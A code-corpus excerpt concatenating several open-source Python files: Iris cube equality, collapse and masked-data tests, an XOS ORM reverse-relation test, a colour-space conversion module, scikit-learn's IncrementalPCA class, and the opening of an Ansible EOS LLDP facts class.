            self.t.metadata = metadata
class TestCubeEquality(TestCube2d):
    """Tests for Cube.__eq__ and Cube.is_compatible."""
    def test_simple_equality(self):
        self.assertEqual(self.t, self.t.copy())
    def test_data_inequality(self):
        self.assertNotEqual(self.t, self.t + 1)
    def test_coords_inequality(self):
        r = self.t.copy()
        r.remove_coord(r.coord('an_other'))
        self.assertNotEqual(self.t, r)
    def test_attributes_inequality(self):
        r = self.t.copy()
        r.attributes['new_thing'] = None
        self.assertNotEqual(self.t, r)
    def test_array_attributes(self):
        # Attribute values that are numpy arrays must still compare sanely.
        r = self.t.copy()
        r.attributes['things'] = np.arange(3)
        s = r.copy()
        self.assertEqual(s, r)
        s.attributes['things'] = np.arange(2)
        self.assertNotEqual(s, r)
        del s.attributes['things']
        self.assertNotEqual(s, r)
    def test_cell_methods_inequality(self):
        r = self.t.copy()
        r.add_cell_method(iris.coords.CellMethod('mean'))
        self.assertNotEqual(self.t, r)
    def test_not_compatible(self):
        r = self.t.copy()
        self.assertTrue(self.t.is_compatible(r))
        # The following changes should make the cubes incompatible.
        # Different units.
        r.units = 'kelvin'
        self.assertFalse(self.t.is_compatible(r))
        # Different cell_methods.
        r = self.t.copy()
        r.add_cell_method(iris.coords.CellMethod('mean', coords='dim1'))
        self.assertFalse(self.t.is_compatible(r))
        # Different attributes.
        r = self.t.copy()
        self.t.attributes['source']= 'bob'
        r.attributes['source'] = 'alice'
        self.assertFalse(self.t.is_compatible(r))
    def test_compatible(self):
        r = self.t.copy()
        self.assertTrue(self.t.is_compatible(r))
        # The following changes should not affect compatibility.
        # Different non-common attributes.
        self.t.attributes['source']= 'bob'
        r.attributes['origin'] = 'alice'
        self.assertTrue(self.t.is_compatible(r))
        # Different coordinates.
        r.remove_coord('dim1')
        self.assertTrue(self.t.is_compatible(r))
        # Different data.
        r.data = np.zeros(r.shape)
        self.assertTrue(self.t.is_compatible(r))
        # Different var_names (but equal name()).
        r.var_name = 'foo'
        self.assertTrue(self.t.is_compatible(r))
    def test_is_compatible_ignore(self):
        r = self.t.copy()
        self.assertTrue(self.t.is_compatible(r))
        # Different histories.
        self.t.attributes['history'] = 'One history.'
        r.attributes['history'] = 'An alternative history.'
        self.assertFalse(self.t.is_compatible(r))
        # Use ignore keyword.
        self.assertTrue(self.t.is_compatible(r, ignore='history'))
        self.assertTrue(self.t.is_compatible(r, ignore=('history',)))
        self.assertTrue(self.t.is_compatible(r, ignore=r.attributes))
    def test_is_compatible_metadata(self):
        # is_compatible also accepts a bare metadata object.
        metadata = self.t.metadata
        self.assertTrue(self.t.is_compatible(metadata))
@tests.skip_data
class TestDataManagerIndexing(TestCube2d):
    """Check that indexing and slicing preserve lazy (deferred) data."""
    def setUp(self):
        # Overrides the TestCube2d fixture with a real lazily-loaded cube.
        self.cube = iris.load_cube(tests.get_data_path(('PP', 'aPProt1', 'rotatedMHtimecube.pp')))
    def assert_is_lazy(self, cube):
        self.assertTrue(cube.has_lazy_data())
    def assert_is_not_lazy(self, cube):
        self.assertFalse(cube.has_lazy_data())
    def test_slices(self):
        lat_cube = next(self.cube.slices(['grid_latitude', ]))
        self.assert_is_lazy(lat_cube)
        self.assert_is_lazy(self.cube)
    def test_cube_empty_indexing(self):
        test_filename = ('cube_slice', 'real_empty_data_indexing.cml')
        r = self.cube[:5, ::-1][3]
        rshape = r.shape
        # Make sure we still have deferred data.
        self.assert_is_lazy(r)
        # check the CML of this result
        self.assertCML(r, test_filename)
        # The CML was checked, meaning the data must have been loaded.
        # Check that the cube no longer has deferred data.
        self.assert_is_not_lazy(r)
        r_data = r.data
        # Finally, load the data before indexing and check that it generates
        # the same result.
        c = self.cube
        c.data
        c = c[:5, ::-1][3]
        self.assertCML(c, test_filename)
        self.assertEqual(rshape, c.shape)
        np.testing.assert_array_equal(r_data, c.data)
    def test_real_data_cube_indexing(self):
        cube = self.cube[(0, 4, 5, 2), 0, 0]
        self.assertCML(cube, ('cube_slice', 'real_data_dual_tuple_indexing1.cml'))
        cube = self.cube[0, (0, 4, 5, 2), (3, 5, 5)]
        self.assertCML(cube, ('cube_slice', 'real_data_dual_tuple_indexing2.cml'))
        cube = self.cube[(0, 4, 5, 2), 0, (3, 5, 5)]
        self.assertCML(cube, ('cube_slice', 'real_data_dual_tuple_indexing3.cml'))
        self.assertRaises(IndexError, self.cube.__getitem__, ((0, 4, 5, 2), (3, 5, 5), 0, 0, 4) )
        self.assertRaises(IndexError, self.cube.__getitem__, (Ellipsis, Ellipsis, Ellipsis, Ellipsis, Ellipsis, Ellipsis) )
    def test_fancy_indexing_bool_array(self):
        # Boolean-array indexing must preserve the data mask.
        cube = self.cube
        cube.data = np.ma.masked_array(cube.data, mask=cube.data > 100000)
        r = cube[:, cube.coord('grid_latitude').points > 1]
        self.assertEqual(r.shape, (10, 218, 720))
        data = cube.data[:, self.cube.coord('grid_latitude').points > 1, :]
        np.testing.assert_array_equal(data, r.data)
        np.testing.assert_array_equal(data.mask, r.data.mask)
class TestCubeCollapsed(tests.IrisTest):
    def partial_compare(self, dual, single):
        """Assert dual- and single-stage collapse results agree on coords, name, units and shape."""
        result = iris.analysis.coord_comparison(dual, single)
        self.assertEqual(len(result['not_equal']), 0)
        self.assertEqual(dual.name(), single.name(), "dual and single stage standard_names differ")
        self.assertEqual(dual.units, single.units, "dual and single stage units differ")
        self.assertEqual(dual.shape, single.shape, "dual and single stage shape differ")
    def collapse_test_common(self, cube, a_name, b_name, *args, **kwargs):
        """Collapse over two coords in both orders and compare against reference CML."""
        # preserve filenames from before the introduction of "grid_" in rotated coord names.
        a_filename = a_name.replace("grid_", "")
        b_filename = b_name.replace("grid_", "")
        # compare dual and single stage collapsing
        dual_stage = cube.collapsed(a_name, iris.analysis.MEAN)
        dual_stage = dual_stage.collapsed(b_name, iris.analysis.MEAN)
        # np.ma.average doesn't apply type promotion rules in some versions,
        # and instead makes the result type float64. To ignore that case we
        # fix up the dtype here if it is promotable from cube.dtype. We still
        # want to catch cases where there is a loss of precision however.
        if dual_stage.dtype > cube.dtype:
            data = dual_stage.data.astype(cube.dtype)
            dual_stage.data = data
        self.assertCMLApproxData(dual_stage, ('cube_collapsed', '%s_%s_dual_stage.cml' % (a_filename, b_filename)), *args, **kwargs)
        single_stage = cube.collapsed([a_name, b_name], iris.analysis.MEAN)
        if single_stage.dtype > cube.dtype:
            data = single_stage.data.astype(cube.dtype)
            single_stage.data = data
        self.assertCMLApproxData(single_stage, ('cube_collapsed', '%s_%s_single_stage.cml' % (a_filename, b_filename)), *args, **kwargs)
        # Compare the cube bits that should match
        self.partial_compare(dual_stage, single_stage)
@tests.skip_data
def test_multi_d(self):
cube = iris.tests.stock.realistic_4d()
# TODO: Re-instate surface_altitude & hybrid-height once we're
# using the post-CF test results.
cube.remove_aux_factory(cube.aux_factories[0])
cube.remove_coord('surface_altitude')
self.assertCML(cube, ('cube_collapsed', 'original.cml'))
# Compare 2-stage collapsing with a single stage collapse
# over 2 Coords.
self.collapse_test_common(cube, 'grid_latitude', 'grid_longitude',
rtol=1e-05)
self.collapse_test_common(cube, 'grid_longitude', 'grid_latitude',
rtol=1e-05)
self.collapse_test_common(cube, 'time', 'grid_latitude', rtol=1e-05)
self.collapse_test_common(cube, 'grid_latitude', 'time', rtol=1e-05)
self.collapse_test_common(cube, 'time', 'grid_longitude', rtol=1e-05)
self.collapse_test_common(cube, 'grid_longitude', 'time', rtol=1e-05)
self.collapse_test_common(cube, 'grid_latitude', 'model_level_number',
rtol=5e-04)
self.collapse_test_common(cube, 'model_level_number', 'grid_latitude',
rtol=5e-04)
self.collapse_test_common(cube, 'grid_longitude', 'model_level_number',
rtol=5e-04)
self.collapse_test_common(cube, 'model_level_number', 'grid_longitude',
rtol=5e-04)
self.collapse_test_common(cube, 'time', 'model_level_number',
rtol=5e-04)
self.collapse_test_common(cube, 'model_level_number', 'time',
rtol=5e-04)
self.collapse_test_common(cube, 'model_level_number', 'time',
rtol=5e-04)
self.collapse_test_common(cube, 'time', 'model_level_number',
rtol=5e-04)
# Collapse 3 things at once.
triple_collapse = cube.collapsed(['model_level_number',
'time', 'grid_longitude'],
iris.analysis.MEAN)
self.assertCMLApproxData(triple_collapse, ('cube_collapsed',
('triple_collapse_ml_pt_'
'lon.cml')),
rtol=5e-04)
triple_collapse = cube.collapsed(['grid_latitude',
'model_level_number', 'time'],
iris.analysis.MEAN)
self.assertCMLApproxData(triple_collapse, ('cube_collapsed',
('triple_collapse_lat_ml'
'_pt.cml')),
rtol=0.05)
# KNOWN PROBLEM: the previous 'rtol' is very large.
# Numpy 1.10 and 1.11 give significantly different results here.
# This may relate to known problems with summing over large arrays,
# which were largely fixed in numpy 1.9 but still occur in some cases,
# as-of numpy 1.11.
# Ensure no side effects
self.assertCML(cube, ('cube_collapsed', 'original.cml'))
@tests.skip_data
class TestTrimAttributes(tests.IrisTest):
    """Cube summaries must render attributes whose values are not strings."""
    def test_non_string_attributes(self):
        # Attach an integer-valued attribute, then look for "gorf ... 23"
        # somewhere in the printed cube summary.
        cube = iris.tests.stock.realistic_4d()
        key = "gorf"
        value = 23
        cube.attributes[key] = value
        summary = cube.summary()
        pattern = re.compile("%s.*?%s" % (key, value))
        found = any(pattern.match(line.strip())
                    for line in summary.split("\n"))
        if not found:
            self.fail('Attribute not found in summary output of cube.')
@tests.skip_data
class TestMaskedData(tests.IrisTest, pp.PPTest):
    """Loading, slicing, saving and merging of PP data containing
    missing-data indicators (MDI)."""
    def _load_3d_cube(self):
        # This 3D data set has a missing a slice with SOME missing values.
        # The missing data is in the pressure = 1000 hPa, forcast_period = 0,
        # time = 1970-02-11 16:00:00 slice.
        return iris.load_cube(tests.get_data_path(["PP", "mdi_handmade_small", "*.pp"]))
    def test_complete_field(self):
        # This pp field has no missing data values
        cube = iris.load_cube(tests.get_data_path(["PP", "mdi_handmade_small", "mdi_test_1000_3.pp"]))
        # With no MDI values the data loads as a plain ndarray, not masked.
        self.assertIsInstance(cube.data, np.ndarray)
    def test_masked_field(self):
        # This pp field has some missing data values
        cube = iris.load_cube(tests.get_data_path(["PP", "mdi_handmade_small", "mdi_test_1000_0.pp"]))
        self.assertIsInstance(cube.data, ma.core.MaskedArray)
    def test_missing_file(self):
        cube = self._load_3d_cube()
        # Any masked field makes the merged cube's data a masked array.
        self.assertIsInstance(cube.data, ma.core.MaskedArray)
        self.assertCML(cube, ('cdm', 'masked_cube.cml'))
    def test_slicing(self):
        cube = self._load_3d_cube()
        # Test the slicing before deferred loading
        full_slice = cube[3]
        partial_slice = cube[0]
        self.assertIsInstance(full_slice.data, np.ndarray)
        self.assertIsInstance(partial_slice.data, ma.core.MaskedArray)
        self.assertEqual(ma.count_masked(partial_slice.data), 25)
        # Test the slicing is consistent after deferred loading
        full_slice = cube[3]
        partial_slice = cube[0]
        self.assertIsInstance(full_slice.data, np.ndarray)
        self.assertIsInstance(partial_slice.data, ma.core.MaskedArray)
        self.assertEqual(ma.count_masked(partial_slice.data), 25)
    def test_save_and_merge(self):
        cube = self._load_3d_cube()
        dtype = cube.dtype
        fill_value = 123456
        # extract the 2d field that has SOME missing values
        masked_slice = cube[0]
        masked_slice.data.fill_value = fill_value
        # test saving masked data
        reference_txt_path = tests.get_result_path(('cdm', 'masked_save_pp.txt'))
        with self.cube_save_test(reference_txt_path, reference_cubes=masked_slice) as temp_pp_path:
            iris.save(masked_slice, temp_pp_path)
        # test merge keeps the mdi we just saved
        cube1 = iris.load_cube(temp_pp_path)
        self.assertEqual(cube1.dtype, dtype)
        cube2 = cube1.copy()
        # make cube1 and cube2 differ on a scalar coord, to make them mergeable into a 3d cube
        cube2.coord("pressure").points = [1001.0]
        merged_cubes = iris.cube.CubeList([cube1, cube2]).merge()
        self.assertEqual(len(merged_cubes), 1, "expected a single merged cube")
        merged_cube = merged_cubes[0]
        self.assertEqual(merged_cube.dtype, dtype)
        # Check that the original masked-array fill-value is *ignored*.
        self.assertArrayAllClose(merged_cube.data.fill_value, -1e30)
@tests.skip_data
class TestConversionToCoordList(tests.IrisTest):
    """Argument normalisation performed by Cube._as_list_of_coords."""
    def test_coord_conversion(self):
        cube = iris.tests.stock.realistic_4d()
        # Single string
        self.assertEqual(len(cube._as_list_of_coords('grid_longitude')), 1)
        # List of string and unicode
        self.assertEqual(len(cube._as_list_of_coords(['grid_longitude',
                                                      u'grid_latitude'], )), 2)
        # Coord object(s)
        lat = cube.coords("grid_latitude")[0]
        lon = cube.coords("grid_longitude")[0]
        self.assertEqual(len(cube._as_list_of_coords(lat)), 1)
        self.assertEqual(len(cube._as_list_of_coords([lat, lon])), 2)
        # Mix of string-like and coord
        self.assertEqual(len(cube._as_list_of_coords(['grid_latitude', lon])),
                         2)
        # Empty list
        self.assertEqual(len(cube._as_list_of_coords([])), 0)
        # Invalid coords: each of these must raise TypeError.
        invalid_choices = [iris.analysis.MEAN, # Caused by mixing up argument order in call to cube.collasped for example
                           None,
                           ['grid_latitude', None],
                           [lat, None],
                           ]
        for coords in invalid_choices:
            with self.assertRaises(TypeError):
                cube._as_list_of_coords(coords)
# Run the iris test suite when this module is executed as a script.
if __name__ == "__main__":
    tests.main()
| lgpl-3.0 |
open-cloud/xos | lib/xos-api/tests/orm_reverse_relations.py | 2 | 2756 | # Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# These are functional tests of ManyToMany relations. These tests need to be conducted end-to-end with a real
# API to verify that the client and server ends of the API are working with each other.
from xosapi import xos_grpc_client
import sys
import unittest
orm = None
SERVICE_1_NAME = "test_service_1"
SERVICEINSTANCE_1_NAME = "test_service_instance_1"
SERVICE_2_NAME = "test_service_2"
SERVICEINSTANCE_2_NAME = "test_service_instance_2"
class TestORMReverseRelations(unittest.TestCase):
    """Functional tests of the reverse-relation accessors
    (provided_links / subscribed_links) on ServiceInstance, run end-to-end
    against a live XOS gRPC API."""
    def setUp(self):
        pass
    def cleanup_models(self, cls, name):
        # Delete every `cls` object with the given name so repeated test
        # runs start from a clean slate.
        objs = cls.objects.filter(name=name)
        for obj in objs:
            obj.delete()
    def tearDown(self):
        self.cleanup_models(orm.ServiceInstance, SERVICEINSTANCE_1_NAME)
        self.cleanup_models(orm.ServiceInstance, SERVICEINSTANCE_2_NAME)
        self.cleanup_models(orm.Service, SERVICE_1_NAME)
        self.cleanup_models(orm.Service, SERVICE_2_NAME)
    def test_reverse_relations(self):
        # Build two services, each owning one service instance.
        service1 = orm.Service(name=SERVICE_1_NAME)
        service1.save()
        serviceinstance1 = orm.ServiceInstance(
            name=SERVICEINSTANCE_1_NAME, owner=service1
        )
        serviceinstance1.save()
        service2 = orm.Service(name=SERVICE_2_NAME)
        service2.save()
        serviceinstance2 = orm.ServiceInstance(
            name=SERVICEINSTANCE_2_NAME, owner=service2
        )
        serviceinstance2.save()
        # Link instance1 (provider side) to instance2 (subscriber side).
        link = orm.ServiceInstanceLink(
            provider_service_instance=serviceinstance1,
            subscriber_service_instance=serviceinstance2,
        )
        link.save()
        # Re-fetch both instances and check the link appears on the reverse
        # relation of each side.
        si1_readback = orm.ServiceInstance.objects.get(id=serviceinstance1.id)
        si2_readback = orm.ServiceInstance.objects.get(id=serviceinstance2.id)
        self.assertEqual(si1_readback.provided_links.count(), 1)
        self.assertEqual(si2_readback.subscribed_links.count(), 1)
def test_callback():
    """Runs once the gRPC client is connected: capture the ORM handle,
    strip the client's extra CLI arguments, and hand control to unittest."""
    global orm
    orm = xos_grpc_client.coreclient.xos_orm
    sys.argv = sys.argv[:1] # unittest gets mad about the orm command line arguments
    unittest.main()
# Connect to the XOS core API; test_callback fires when the channel is ready.
xos_grpc_client.start_api_parseargs(test_callback)
| apache-2.0 |
RitwikGupta/CardboardVision | colorsys.py | 1 | 3639 |
#This modules provides two functions for each color system ABC:
# rgb_to_abc(r, g, b) --> a, b, c
# abc_to_rgb(a, b, c) --> r, g, b
#All inputs and outputs are triples of floats in the range [0.0...1.0]
#(with the exception of I and Q, which covers a slightly larger range).
#Inputs outside the valid range may cause exceptions or invalid outputs.
#Supported color systems:
#RGB: Red, Green, Blue components
#YIQ: Luminance, Chrominance (used by composite video signals)
#HLS: Hue, Luminance, Saturation
#HSV: Hue, Saturation, Value
# References:
# http://en.wikipedia.org/wiki/YIQ
# http://en.wikipedia.org/wiki/HLS_color_space
# http://en.wikipedia.org/wiki/HSV_color_space
__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",
"rgb_to_hsv","hsv_to_rgb"]
# Some floating point constants
ONE_THIRD = 1.0/3.0
ONE_SIXTH = 1.0/6.0
TWO_THIRD = 2.0/3.0
# YIQ: used by composite video signals (linear combinations of RGB)
# Y: perceived grey level (0.0 == black, 1.0 == white)
# I, Q: color components
def rgb_to_yiq(r, g, b):
    """Convert an RGB color to YIQ.

    Inputs are floats in [0, 1]; Y is the perceived luminance and I/Q are
    the chrominance components (I and Q may fall slightly outside [0, 1]).
    """
    return (
        0.30*r + 0.59*g + 0.11*b,   # y: luminance
        0.60*r - 0.28*g - 0.32*b,   # i: orange-blue chrominance
        0.21*r - 0.52*g + 0.31*b,   # q: purple-green chrominance
    )
def yiq_to_rgb(y, i, q):
    """Convert a YIQ color back to RGB, clamping each channel to [0, 1]."""
    r = y + 0.948262*i + 0.624013*q
    g = y - 0.276066*i - 0.639810*q
    b = y - 1.105450*i + 1.729860*q
    # Out-of-gamut values are clipped rather than wrapped.
    clamp = lambda c: min(max(c, 0.0), 1.0)
    return (clamp(r), clamp(g), clamp(b))
# HLS: Hue, Luminance, Saturation
# H: position in the spectrum
# L: color lightness
# S: color saturation
def rgb_to_hls(r, g, b):
    """Convert an RGB color to HLS (hue, lightness, saturation).

    All coordinates are floats in [0, 1].
    """
    maxc = max(r, g, b)
    minc = min(r, g, b)
    l = (minc+maxc)/2.0
    if minc == maxc:
        # Achromatic: hue and saturation are undefined, report zeros.
        return 0.0, l, 0.0
    delta = maxc - minc
    # Saturation is normalised differently above and below mid-lightness.
    s = delta / (maxc+minc) if l <= 0.5 else delta / (2.0-maxc-minc)
    # Distance of each channel from the maximum, normalised by the range.
    rc = (maxc-r) / delta
    gc = (maxc-g) / delta
    bc = (maxc-b) / delta
    if r == maxc:
        h = bc-gc
    elif g == maxc:
        h = 2.0+rc-bc
    else:
        h = 4.0+gc-rc
    return (h/6.0) % 1.0, l, s
def hls_to_rgb(h, l, s):
    """Convert an HLS color to RGB.  All coordinates are floats in [0, 1]."""
    if s == 0.0:
        # Zero saturation: achromatic, every channel equals the lightness.
        return l, l, l
    # m1/m2 are the endpoints the helper _v() interpolates between.
    m2 = l * (1.0+s) if l <= 0.5 else l+s-(l*s)
    m1 = 2.0*l - m2
    red = _v(m1, m2, h+ONE_THIRD)
    green = _v(m1, m2, h)
    blue = _v(m1, m2, h-ONE_THIRD)
    return (red, green, blue)
def _v(m1, m2, hue):
    # Piecewise-linear interpolation between m1 and m2 over one hue cycle:
    # ramp up on [0, 1/6), hold m2 on [1/6, 1/2), ramp down on [1/2, 2/3),
    # and hold m1 for the remainder of the cycle.
    hue = hue % 1.0
    if hue < ONE_SIXTH:
        return m1 + (m2-m1)*hue*6.0
    elif hue < 0.5:
        return m2
    elif hue < TWO_THIRD:
        return m1 + (m2-m1)*(TWO_THIRD-hue)*6.0
    else:
        return m1
# HSV: Hue, Saturation, Value
# H: position in the spectrum
# S: color saturation ("purity")
# V: color brightness
def rgb_to_hsv(r, g, b):
    """Convert an RGB color to HSV (hue, saturation, value).

    All coordinates are floats in [0, 1].
    """
    maxc = max(r, g, b)
    minc = min(r, g, b)
    v = maxc
    if minc == maxc:
        # Grey pixel: hue and saturation are undefined, report zeros.
        return 0.0, 0.0, v
    delta = maxc - minc
    s = delta / maxc
    # Distance of each channel from the maximum, normalised by the range.
    rc = (maxc-r) / delta
    gc = (maxc-g) / delta
    bc = (maxc-b) / delta
    if r == maxc:
        h = bc-gc
    elif g == maxc:
        h = 2.0+rc-bc
    else:
        h = 4.0+gc-rc
    return (h/6.0) % 1.0, s, v
def hsv_to_rgb(h, s, v):
    """Convert an HSV color to RGB.  All coordinates are floats in [0, 1]."""
    if s == 0.0:
        # Zero saturation is a pure grey at brightness v.
        return v, v, v
    # Split the hue circle into six sectors and interpolate within one.
    sector = int(h*6.0)  # int() truncates toward zero, as the original assumed
    f = (h*6.0) - sector
    p = v*(1.0 - s)
    q = v*(1.0 - s*f)
    t = v*(1.0 - s*(1.0-f))
    # Channel layout for each sector, replacing the original if-chain.
    return (
        (v, t, p),
        (q, v, p),
        (p, v, t),
        (p, q, v),
        (t, p, v),
        (v, p, q),
    )[sector % 6]
| gpl-2.0 |
rahuldhote/scikit-learn | sklearn/decomposition/incremental_pca.py | 199 | 10508 | """Incremental Principal Components Analysis."""
# Author: Kyle Kastner <kastnerkyle@gmail.com>
# License: BSD 3 clause
import numpy as np
from scipy import linalg
from .base import _BasePCA
from ..utils import check_array, gen_batches
from ..utils.extmath import svd_flip, _batch_mean_variance_update
class IncrementalPCA(_BasePCA):
    """Incremental principal components analysis (IPCA).
    Linear dimensionality reduction using Singular Value Decomposition of
    centered data, keeping only the most significant singular vectors to
    project the data to a lower dimensional space.
    Depending on the size of the input data, this algorithm can be much more
    memory efficient than a PCA.
    This algorithm has constant memory complexity, on the order
    of ``batch_size``, enabling use of np.memmap files without loading the
    entire file into memory.
    The computational overhead of each SVD is
    ``O(batch_size * n_features ** 2)``, but only 2 * batch_size samples
    remain in memory at a time. There will be ``n_samples / batch_size`` SVD
    computations to get the principal components, versus 1 large SVD of
    complexity ``O(n_samples * n_features ** 2)`` for PCA.
    Read more in the :ref:`User Guide <IncrementalPCA>`.
    Parameters
    ----------
    n_components : int or None, (default=None)
        Number of components to keep. If ``n_components `` is ``None``,
        then ``n_components`` is set to ``min(n_samples, n_features)``.
    batch_size : int or None, (default=None)
        The number of samples to use for each batch. Only used when calling
        ``fit``. If ``batch_size`` is ``None``, then ``batch_size``
        is inferred from the data and set to ``5 * n_features``, to provide a
        balance between approximation accuracy and memory consumption.
    copy : bool, (default=True)
        If False, X will be overwritten. ``copy=False`` can be used to
        save memory but is unsafe for general use.
    whiten : bool, optional
        When True (False by default) the ``components_`` vectors are divided
        by ``n_samples`` times ``components_`` to ensure uncorrelated outputs
        with unit component-wise variances.
        Whitening will remove some information from the transformed signal
        (the relative variance scales of the components) but can sometimes
        improve the predictive accuracy of the downstream estimators by
        making data respect some hard-wired assumptions.
    Attributes
    ----------
    components_ : array, shape (n_components, n_features)
        Components with maximum variance.
    explained_variance_ : array, shape (n_components,)
        Variance explained by each of the selected components.
    explained_variance_ratio_ : array, shape (n_components,)
        Percentage of variance explained by each of the selected components.
        If all components are stored, the sum of explained variances is equal
        to 1.0
    mean_ : array, shape (n_features,)
        Per-feature empirical mean, aggregate over calls to ``partial_fit``.
    var_ : array, shape (n_features,)
        Per-feature empirical variance, aggregate over calls to ``partial_fit``.
    noise_variance_ : float
        The estimated noise covariance following the Probabilistic PCA model
        from Tipping and Bishop 1999. See "Pattern Recognition and
        Machine Learning" by C. Bishop, 12.2.1 p. 574 or
        http://www.miketipping.com/papers/met-mppca.pdf.
    n_components_ : int
        The estimated number of components. Relevant when ``n_components=None``.
    n_samples_seen_ : int
        The number of samples processed by the estimator. Will be reset on
        new calls to fit, but increments across ``partial_fit`` calls.
    Notes
    -----
    Implements the incremental PCA model from:
    `D. Ross, J. Lim, R. Lin, M. Yang, Incremental Learning for Robust Visual
    Tracking, International Journal of Computer Vision, Volume 77, Issue 1-3,
    pp. 125-141, May 2008.`
    See http://www.cs.toronto.edu/~dross/ivt/RossLimLinYang_ijcv.pdf
    This model is an extension of the Sequential Karhunen-Loeve Transform from:
    `A. Levy and M. Lindenbaum, Sequential Karhunen-Loeve Basis Extraction and
    its Application to Images, IEEE Transactions on Image Processing, Volume 9,
    Number 8, pp. 1371-1374, August 2000.`
    See http://www.cs.technion.ac.il/~mic/doc/skl-ip.pdf
    We have specifically abstained from an optimization used by authors of both
    papers, a QR decomposition used in specific situations to reduce the
    algorithmic complexity of the SVD. The source for this technique is
    `Matrix Computations, Third Edition, G. Holub and C. Van Loan, Chapter 5,
    section 5.4.4, pp 252-253.`. This technique has been omitted because it is
    advantageous only when decomposing a matrix with ``n_samples`` (rows)
    >= 5/3 * ``n_features`` (columns), and hurts the readability of the
    implemented algorithm. This would be a good opportunity for future
    optimization, if it is deemed necessary.
    References
    ----------
    D. Ross, J. Lim, R. Lin, M. Yang. Incremental Learning for Robust Visual
    Tracking, International Journal of Computer Vision, Volume 77,
    Issue 1-3, pp. 125-141, May 2008.
    G. Golub and C. Van Loan. Matrix Computations, Third Edition, Chapter 5,
    Section 5.4.4, pp. 252-253.
    See also
    --------
    PCA
    RandomizedPCA
    KernelPCA
    SparsePCA
    TruncatedSVD
    """
    def __init__(self, n_components=None, whiten=False, copy=True,
                 batch_size=None):
        self.n_components = n_components
        self.whiten = whiten
        self.copy = copy
        self.batch_size = batch_size
    def fit(self, X, y=None):
        """Fit the model with X, using minibatches of size batch_size.
        Parameters
        ----------
        X: array-like, shape (n_samples, n_features)
            Training data, where n_samples is the number of samples and
            n_features is the number of features.
        y: Passthrough for ``Pipeline`` compatibility.
        Returns
        -------
        self: object
            Returns the instance itself.
        """
        # Reset all fitted state: unlike partial_fit, fit() always starts
        # from scratch.
        self.components_ = None
        self.mean_ = None
        self.singular_values_ = None
        self.explained_variance_ = None
        self.explained_variance_ratio_ = None
        self.noise_variance_ = None
        self.var_ = None
        self.n_samples_seen_ = 0
        X = check_array(X, dtype=np.float)
        n_samples, n_features = X.shape
        if self.batch_size is None:
            self.batch_size_ = 5 * n_features
        else:
            self.batch_size_ = self.batch_size
        # Feed the data through partial_fit one mini-batch at a time.
        for batch in gen_batches(n_samples, self.batch_size_):
            self.partial_fit(X[batch])
        return self
    def partial_fit(self, X, y=None):
        """Incremental fit with X. All of X is processed as a single batch.
        Parameters
        ----------
        X: array-like, shape (n_samples, n_features)
            Training data, where n_samples is the number of samples and
            n_features is the number of features.
        Returns
        -------
        self: object
            Returns the instance itself.
        """
        X = check_array(X, copy=self.copy, dtype=np.float)
        n_samples, n_features = X.shape
        if not hasattr(self, 'components_'):
            self.components_ = None
        if self.n_components is None:
            self.n_components_ = n_features
        elif not 1 <= self.n_components <= n_features:
            raise ValueError("n_components=%r invalid for n_features=%d, need "
                             "more rows than columns for IncrementalPCA "
                             "processing" % (self.n_components, n_features))
        else:
            self.n_components_ = self.n_components
        if (self.components_ is not None) and (self.components_.shape[0]
                                               != self.n_components_):
            raise ValueError("Number of input features has changed from %i "
                             "to %i between calls to partial_fit! Try "
                             "setting n_components to a fixed value." % (
                                 self.components_.shape[0], self.n_components_))
        if self.components_ is None:
            # This is the first pass through partial_fit
            self.n_samples_seen_ = 0
            col_var = X.var(axis=0)
            col_mean = X.mean(axis=0)
            X -= col_mean
            U, S, V = linalg.svd(X, full_matrices=False)
            # Deterministic sign convention so results are reproducible.
            U, V = svd_flip(U, V, u_based_decision=False)
            explained_variance = S ** 2 / n_samples
            explained_variance_ratio = S ** 2 / np.sum(col_var *
                                                       n_samples)
        else:
            col_batch_mean = X.mean(axis=0)
            # Update the running per-feature mean/variance with this batch.
            col_mean, col_var, n_total_samples = _batch_mean_variance_update(
                X, self.mean_, self.var_, self.n_samples_seen_)
            X -= col_batch_mean
            # Build matrix of combined previous basis and new data
            mean_correction = np.sqrt((self.n_samples_seen_ * n_samples) /
                                      n_total_samples) * (self.mean_ -
                                                          col_batch_mean)
            X_combined = np.vstack((self.singular_values_.reshape((-1, 1)) *
                                    self.components_, X,
                                    mean_correction))
            U, S, V = linalg.svd(X_combined, full_matrices=False)
            U, V = svd_flip(U, V, u_based_decision=False)
            explained_variance = S ** 2 / n_total_samples
            explained_variance_ratio = S ** 2 / np.sum(col_var *
                                                       n_total_samples)
        # Keep only the leading n_components_ directions and update state.
        self.n_samples_seen_ += n_samples
        self.components_ = V[:self.n_components_]
        self.singular_values_ = S[:self.n_components_]
        self.mean_ = col_mean
        self.var_ = col_var
        self.explained_variance_ = explained_variance[:self.n_components_]
        self.explained_variance_ratio_ = \
            explained_variance_ratio[:self.n_components_]
        if self.n_components_ < n_features:
            # Remaining variance is attributed to isotropic noise (PPCA model).
            self.noise_variance_ = \
                explained_variance[self.n_components_:].mean()
        else:
            self.noise_variance_ = 0.
        return self
| bsd-3-clause |
toshywoshy/ansible | lib/ansible/module_utils/network/eos/facts/lldp_global/lldp_global.py | 21 | 2946 | #
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""
The eos lldp_global fact class
It is in this file the configuration is collected from the device
for a given resource, parsed, and the facts tree is populated
based on the configuration.
"""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
from copy import deepcopy
from ansible.module_utils.network.common import utils
from ansible.module_utils.network.eos.argspec.lldp_global.lldp_global import Lldp_globalArgs
class Lldp_globalFacts(object):
    """ The eos lldp_global fact class
    """
    def __init__(self, module, subspec='config', options='options'):
        self._module = module
        self.argument_spec = Lldp_globalArgs.argument_spec
        spec = deepcopy(self.argument_spec)
        # Narrow the argspec to the requested subsection, if any.
        if subspec:
            if options:
                facts_argument_spec = spec[subspec][options]
            else:
                facts_argument_spec = spec[subspec]
        else:
            facts_argument_spec = spec
